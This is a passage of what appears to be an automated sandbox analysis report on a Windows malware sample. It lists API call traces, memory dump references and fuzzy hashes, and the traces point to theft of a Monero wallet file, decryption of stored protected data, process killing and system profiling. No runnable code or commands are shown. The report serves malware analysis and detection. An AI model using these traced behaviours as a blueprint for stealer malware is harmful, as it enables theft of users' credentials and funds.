                                  • StrCmpCA.SHLWAPI(?,006D15AC), ref: 006BDC33
                                  • StrCmpCA.SHLWAPI(?,006D15B0), ref: 006BDC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BDECC
                                  • FindClose.KERNEL32(000000FF), ref: 006BDEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 9bf67983dc5ae99c01244b1a2f5252e3ff66096fe0af852d32182e4c8afdec95
                                  • Instruction ID: b5a8f97c5990a1acdc65e4d9eeef591f67f04625e1a99250fc485b5031988294
                                  • Opcode Fuzzy Hash: 9bf67983dc5ae99c01244b1a2f5252e3ff66096fe0af852d32182e4c8afdec95
                                  • Instruction Fuzzy Hash: 919123B2A101089BCB54FBF0ED96EFD737EAF84344F00465CB9065A141EA34DB488B96
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C9905
                                  • Process32First.KERNEL32(006B9FDE,00000128), ref: 006C9919
                                  • Process32Next.KERNEL32(006B9FDE,00000128), ref: 006C992E
                                  • StrCmpCA.SHLWAPI(?,006B9FDE), ref: 006C9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C997A
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9987
                                  • CloseHandle.KERNEL32(006B9FDE), ref: 006C9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 52ab00df065c0b4a6143ae6283e37c06fc2f57a601975261b8876823eec06633
                                  • Instruction ID: 3b4d237d16271e1f22b0b5384a481d0936547617ffb9d56a7fec376e59a27b59
                                  • Opcode Fuzzy Hash: 52ab00df065c0b4a6143ae6283e37c06fc2f57a601975261b8876823eec06633
                                  • Instruction Fuzzy Hash: 35110A75A18208EBCB24DFE0DC8CBEDB7B9AB48700F10458CF519A6340DB749A84DFA0
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,006D05B7), ref: 006C7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006C7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 006C7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006C7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 006C7EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 87ed25615845999895139070afc0a5921571bd8bfa95eca81d9a81d45262ccfc
                                  • Instruction ID: f51527934d9abd69a606ca01c57c352f40a6b57e5dd0ab978050fdbba269959b
                                  • Opcode Fuzzy Hash: 87ed25615845999895139070afc0a5921571bd8bfa95eca81d9a81d45262ccfc
                                  • Instruction Fuzzy Hash: F0414971944218ABCB64DB94DC99FFEB376EB48704F2041DDE10A62280DB346F84CF65
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006D0D79), ref: 006BE5A2
                                  • StrCmpCA.SHLWAPI(?,006D15F0), ref: 006BE5F2
                                  • StrCmpCA.SHLWAPI(?,006D15F4), ref: 006BE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: eb96d1a63cf529cc3f63aca9a81da73c742b0c076d6b2f9689dd67905e44f3ab
                                  • Instruction ID: a85d6a687b29d79ca4125c85959e443c84d36827be697512236c0adc3b22751b
                                  • Opcode Fuzzy Hash: eb96d1a63cf529cc3f63aca9a81da73c742b0c076d6b2f9689dd67905e44f3ab
                                  • Instruction Fuzzy Hash: CD12DA72A1011C9ACB54FBA0DDA6FFD733BEF54304F4045ADA50A56191EE30AF88CB5A
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                  • LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >Ok
                                  • API String ID: 4291131564-2083912338
                                  • Opcode ID: b161df25a2f8fe5ebef6cde7d7f748734d60accdcd35d5335b4cba22bec4e06b
                                  • Instruction ID: d62138ee31a639ccce5c0b2365f173bb95c32ba02c31ec21e595a36d0a034ea3
                                  • Opcode Fuzzy Hash: b161df25a2f8fe5ebef6cde7d7f748734d60accdcd35d5335b4cba22bec4e06b
                                  • Instruction Fuzzy Hash: 4F11A4B4244308AFEB11CFA4CC95FAA77B5EB89B10F208458FD159B390C772EA41DB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1*~$Q&s$R$?_$vzGo$~=;
                                  • API String ID: 0-3660083655
                                  • Opcode ID: 49e51dd082c1e6dad75621cf8faecc0b5f41d128fcc818d7013ff33face973bf
                                  • Instruction ID: 9ad31d12f96108055af03f3d5b2623f96bf8504ba8546789649ae9070e12d996
                                  • Opcode Fuzzy Hash: 49e51dd082c1e6dad75621cf8faecc0b5f41d128fcc818d7013ff33face973bf
                                  • Instruction Fuzzy Hash: 75B236F360C2049FE304AE29EC8567AFBE5EF94720F16893DE6C5C3744EA3598058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 7fb682d395658e57b50d4c103f391b572adc2a9b04e69da36331e4cf68d32160
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: C4416012D19BD5C5CB058B7844A02EEBFB22FD6210F6D82DAC49D5F3C2C778514AD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006BC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006BC97C
                                  • lstrcat.KERNEL32(?,006D0B47), ref: 006BCA43
                                  • lstrcat.KERNEL32(?,006D0B4B), ref: 006BCA57
                                  • lstrcat.KERNEL32(?,006D0B4E), ref: 006BCA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 9ecca3ac6197387ffd6203e0a9189dbb6aa084a8001d7eae60007e3f6d39dd72
                                  • Instruction ID: 88899bbd7e5cd5e301b16c880465bf34ed7fe218d7c99ff8b167ce02f90576f2
                                  • Opcode Fuzzy Hash: 9ecca3ac6197387ffd6203e0a9189dbb6aa084a8001d7eae60007e3f6d39dd72
                                  • Instruction Fuzzy Hash: 364151B4D1821EABDB10CF94DD89BFEF7B9AB48304F1041A9E509A6380D7749B84DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006B72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006B72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006B7304
                                  • LocalFree.KERNEL32(?), ref: 006B730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: c160f50870284f99dcef4f2f9dac5d4208299906d42e6625eaa290ada61631e0
                                  • Instruction ID: a6ca54f58cea259d723c6f3192a5bc6bd1cf9f3f2c2f83000002e73555609f00
                                  • Opcode Fuzzy Hash: c160f50870284f99dcef4f2f9dac5d4208299906d42e6625eaa290ada61631e0
                                  • Instruction Fuzzy Hash: 6C0112B5A58308BBDB10DFE4DC45F9DB779AB44B00F204545FB05AB3C0D670AA409B65
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C97AE
                                  • Process32First.KERNEL32(006D0ACE,00000128), ref: 006C97C2
                                  • Process32Next.KERNEL32(006D0ACE,00000128), ref: 006C97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 006C97EC
                                  • CloseHandle.KERNEL32(006D0ACE), ref: 006C980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 53ec8517e81496e3b859f1668a4ce2532522ad2342d65dbee6a99c4493b0ca75
                                  • Instruction ID: 455e51acc37877878ece7917afde6a48d878e0bb735f1ecfcd90f2d09d23429a
                                  • Opcode Fuzzy Hash: 53ec8517e81496e3b859f1668a4ce2532522ad2342d65dbee6a99c4493b0ca75
                                  • Instruction Fuzzy Hash: 1201E575A19208EBDB20DFA4CD48BEDBBB9EB09700F104588E509A7240EB34EA40DB60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 5ad81d8ce2962f1179e9fe578e10dae7d707d0099e23833bef367620ab0b1e35
                                  • Instruction ID: 26922f768643af94e4afaafb6dbafef10940717d1e9812659a51d9b71f2d987a
                                  • Opcode Fuzzy Hash: 5ad81d8ce2962f1179e9fe578e10dae7d707d0099e23833bef367620ab0b1e35
                                  • Instruction Fuzzy Hash: A263333281EBD41EC727DB3087B65917F67BA1361031949CFC4C28FAB3C6949A1AE356
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7O{$GvW$hs>$iK}v
                                  • API String ID: 0-4205074937
                                  • Opcode ID: 226395440817efbe9e38ca6e9f50ebc1764e82744570ae9d74f5b61148cef8ae
                                  • Instruction ID: f835f31b6e97f54e61f575d79f36705d3ee993e48132e56de3cb4883e72ef10e
                                  • Opcode Fuzzy Hash: 226395440817efbe9e38ca6e9f50ebc1764e82744570ae9d74f5b61148cef8ae
                                  • Instruction Fuzzy Hash: 28B2F6F3A0C2149FE304AE2DEC8567ABBE5EF94720F16853DEAC4C3744EA3558058697
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,006B51D4,40000001,00000000,00000000,?,006B51D4), ref: 006C9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: da16b6ad0bf2636a2ff50e741e2942ca69da57d0b8a4a32d5b21372a7606eea0
                                  • Instruction ID: 1692620332bd1769390f4be623cbad77b1cc59d2853f98ba95b24f2d2e8e8daa
                                  • Opcode Fuzzy Hash: da16b6ad0bf2636a2ff50e741e2942ca69da57d0b8a4a32d5b21372a7606eea0
                                  • Instruction Fuzzy Hash: 2111C875214205EFDB04CF94D889FBA73AAEF89310F20855CF9198B350D775E9419BA4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006D0DE8,00000000,?), ref: 006C7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,006D0DE8,00000000,?), ref: 006C7B54
                                  • wsprintfA.USER32 ref: 006C7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: b47c72af6776858349e0f04cd39893cc8a7abb5d7eed97f8888a20cce2427afa
                                  • Instruction ID: 36aea88a63faac17fab2a219a08fc13365930d8e7e24a1e31a42d6a33a19c02e
                                  • Opcode Fuzzy Hash: b47c72af6776858349e0f04cd39893cc8a7abb5d7eed97f8888a20cce2427afa
                                  • Instruction Fuzzy Hash: 7F1118B2918118AACB149FC9DD45FBEF7B8EB4CB11F10411AF615A2280D2399940D7B0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0147E410,00000000,?,006D0DF8,00000000,?,00000000,00000000), ref: 006C7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0147E410,00000000,?,006D0DF8,00000000,?,00000000,00000000,?), ref: 006C7C0D
                                  • wsprintfA.USER32 ref: 006C7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: f29a6d615b2aa0c71e41dd8c89145b45276d85a0dc16c2e4e0d9fcdca1a5fbed
                                  • Instruction ID: 3028bd9c1ae27df982c6243349fafcb9ed7740d9364d2b3d94cf1578f6dbdae9
                                  • Opcode Fuzzy Hash: f29a6d615b2aa0c71e41dd8c89145b45276d85a0dc16c2e4e0d9fcdca1a5fbed
                                  • Instruction Fuzzy Hash: 04118EB1909219EFEB208B54DC49FA9B778FB44711F100799F619A33D0D7745A409F50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EY=Z$acwm$'?}
                                  • API String ID: 0-3927454116
                                  • Opcode ID: a54d057fa96f49f85f0dea4dd771e925dac1da7ef2c99ae443449a92433c23a2
                                  • Instruction ID: e82b42f16401447ed3782a1e1091078e51ee20bae5b3714e0c71f1df3a17e79d
                                  • Opcode Fuzzy Hash: a54d057fa96f49f85f0dea4dd771e925dac1da7ef2c99ae443449a92433c23a2
                                  • Instruction Fuzzy Hash: 02B24AF3A0C2049FE304AE2DEC8567AFBE5EF94320F1A863DE6C4D7744E93559058692
                                  APIs
                                  • CoCreateInstance.COMBASE(006CE120,00000000,00000001,006CE110,00000000), ref: 006C39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006C3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: a38475b7333f083f2e85c3bd28b191e9a81efc9ed5a4f0999c707a142891e06e
